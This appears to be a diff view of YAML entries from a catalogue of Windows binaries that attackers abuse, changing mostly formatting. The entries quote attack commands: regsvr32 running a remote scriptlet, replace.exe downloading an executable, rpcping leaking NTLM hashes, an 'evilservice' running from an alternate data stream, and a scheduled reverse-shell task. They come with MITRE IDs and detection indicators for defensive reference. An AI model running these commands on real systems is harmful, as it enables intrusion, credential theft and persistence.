@ -24,4 +24,4 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Eli Salem
|
||||
Handle: '@elisalem9'
|
||||
---
|
||||
---
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Register-cimprovider.exe
|
||||
Description: Used to register new wmi providers
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: Register-cimprovider -path "C:\folder\evil.dll"
|
||||
Description: Load the target .DLL.
|
||||
@ -15,7 +15,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\Register-cimprovider.exe
|
||||
- Path: C:\Windows\SysWOW64\Register-cimprovider.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
@ -24,4 +24,4 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Philip Tsukerman
|
||||
Handle: '@PhilipTsukerman'
|
||||
---
|
||||
---
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Regsvcs.exe
|
||||
Description: Regsvcs and Regasm are Windows command-line utilities that are used to register .NET Component Object Model (COM) assemblies
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: regsvcs.exe AllTheThingsx64.dll
|
||||
Description: Loads the target .DLL file and executes the RegisterClass function.
|
||||
@ -23,7 +23,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\regsvcs.exe
|
||||
- Path: C:\Windows\SysWOW64\regsvcs.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Regsvr32.exe
|
||||
Description: Used by Windows to register dlls
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
|
||||
Description: Execute the specified remote .SCT script with scrobj.dll.
|
||||
@ -39,7 +39,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\regsvr32.exe
|
||||
- Path: C:\Windows\SysWOW64\regsvr32.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: regsvr32.exe getting files from Internet
|
||||
@ -51,4 +51,4 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Casey Smith
|
||||
Handle: '@subtee'
|
||||
---
|
||||
---
|
||||
|
@ -1,12 +1,12 @@
|
||||
---
|
||||
Name: Replace.exe
|
||||
Description: Used to replace file with another file
|
||||
Description: Used to replace file with another file
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: replace.exe C:\Source\File.cab C:\Destination /A
|
||||
Description: Copy file.cab to destination
|
||||
Usecase: Copy files
|
||||
Usecase: Copy files
|
||||
Category: Copy
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
@ -14,7 +14,7 @@ Commands:
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: replace.exe \\webdav.host.com\foo\bar.exe c:\outdir /A
|
||||
Description: Download/Copy bar.exe to outdir
|
||||
Usecase: Download file
|
||||
Usecase: Download file
|
||||
Category: Download
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
@ -23,7 +23,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\replace.exe
|
||||
- Path: C:\Windows\SysWOW64\replace.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Replace.exe getting files from remote server
|
||||
@ -33,4 +33,4 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: elceef
|
||||
Handle: '@elceef'
|
||||
---
|
||||
---
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Rpcping.exe
|
||||
Description: Used to verify rpc connection
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: rpcping -s 127.0.0.1 -e 1234 -a privacy -u NTLM
|
||||
Description: Send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.
|
||||
@ -23,7 +23,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\rpcping.exe
|
||||
- Path: C:\Windows\SysWOW64\rpcping.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Rundll32.exe
|
||||
Description: Used by Windows to execute dll files
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: rundll32.exe AllTheThingsx64,EntryPoint
|
||||
Description: AllTheThingsx64 would be a .DLL file and EntryPoint would be the name of the entry point in the .DLL file to execute.
|
||||
@ -65,13 +65,13 @@ Commands:
|
||||
Usecase: Execute a DLL/EXE COM server payload or ScriptletURL code.
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID:
|
||||
MitreLink:
|
||||
MitreID:
|
||||
MitreLink:
|
||||
OperatingSystem: Windows 10 (and likely previous versions)
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\rundll32.exe
|
||||
- Path: C:\Windows\SysWOW64\rundll32.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
|
@ -1,8 +1,8 @@
|
||||
---
|
||||
Name: Runonce.exe
|
||||
Description:
|
||||
Description:
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: Runonce.exe /AlternateShellStartup
|
||||
Description: Executes a Run Once Task that has been configured in the registry
|
||||
@ -15,7 +15,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\runonce.exe
|
||||
- Path: C:\Windows\SysWOW64\runonce.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\YOURKEY
|
||||
@ -25,4 +25,4 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Pierre-Alexandre Braeken
|
||||
Handle: '@pabraeken'
|
||||
---
|
||||
---
|
||||
|
@ -1,8 +1,8 @@
|
||||
---
|
||||
Name: Runscripthelper.exe
|
||||
Description:
|
||||
Description:
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: runscripthelper.exe surfacecheck \\?\C:\Test\Microsoft\Diagnosis\scripts\test.txt C:\Test
|
||||
Description: Execute the PowerShell script named test.txt
|
||||
@ -15,7 +15,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\Runscripthelper.exe
|
||||
- Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\Runscripthelper.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Event 4014 - Powershell logging
|
||||
@ -25,4 +25,4 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Matt Graeber
|
||||
Handle: '@mattifestation'
|
||||
---
|
||||
---
|
||||
|
@ -2,12 +2,12 @@
|
||||
Name: Sc.exe
|
||||
Description: Used by Windows to manage services
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: sc create evilservice binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto\ & sc start evilservice
|
||||
Description: Creates a new service and executes the file stored in the ADS.
|
||||
Usecase: Execute binary file hidden inside an alternate data stream
|
||||
Category: ADS
|
||||
Category: ADS
|
||||
Privileges: User
|
||||
MitreID: T1096
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
||||
@ -15,7 +15,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\sc.exe
|
||||
- Path: C:\Windows\SysWOW64\sc.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Services that gets created
|
||||
@ -24,4 +24,4 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
||||
---
|
||||
|
@ -2,12 +2,12 @@
|
||||
Name: Schtasks.exe
|
||||
Description: Schedule periodic tasks
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: schtasks /create /sc minute /mo 1 /tn "Reverse shell" /tr c:\some\directory\revshell.exe
|
||||
Description: Create a recurring task to execute every minute.
|
||||
Usecase: Create a recurring task, to eg. to keep reverse shell session(s) alive
|
||||
Category: Execute
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1053
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1053
|
||||
@ -15,7 +15,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: c:\windows\system32\schtasks.exe
|
||||
- Path: c:\windows\syswow64\schtasks.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Services that gets created
|
||||
@ -24,4 +24,4 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person:
|
||||
Handle:
|
||||
---
|
||||
---
|
||||
|
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue
Block a user